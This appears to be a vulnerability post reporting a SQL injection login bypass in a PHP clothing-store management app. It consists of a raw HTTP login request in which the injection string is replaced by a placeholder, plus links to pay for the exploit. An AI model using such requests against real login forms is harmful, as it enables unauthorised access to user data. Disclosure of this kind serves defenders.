# Titles: Clothing Store Management System-1.0 SQLi Bypass Authentication
# Author: nu11secur1ty
# Date: 04/22/2025
# Vendor: https://github.com/oretnom23
# Software:
https://www.sourcecodester.com/php/14576/clothing-store-management-system-using-phpmysqli-source-code.html
# Reference: https://portswigger.net/web-security/sql-injection

## Description:
The username parameter is vulnerable for SQLi-Bypass Authentication
vulnerability. The parameter is not sanitizing well. The attacker can get
all sensitive information from this system when he attacks it online, He
can login super easily WITHOUT PASSWORD - ONLY USER - bypassing, and can
crash or get every sensitive information from him!

STATUS: HIGH-CRITICAL Vulnerability


[+]Exploit:
- SQLi:

```SQLi
POST /clothing/ajax.php?action=login HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=d1n8rpqnj189r1vdlq3g6rdsk4
Content-Length: 44
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0)
Gecko/20100101 Firefox/134.0
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/clothing/login.php
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

username=the_exploit_here&password=
```

# Reproduce:
[href](https://www.patreon.com/posts/clothing-store-1-127189847)

# Buy an exploit only:
[href](https://satoshidisk.com/pay/COEb97)

# Time spent:
00:05:00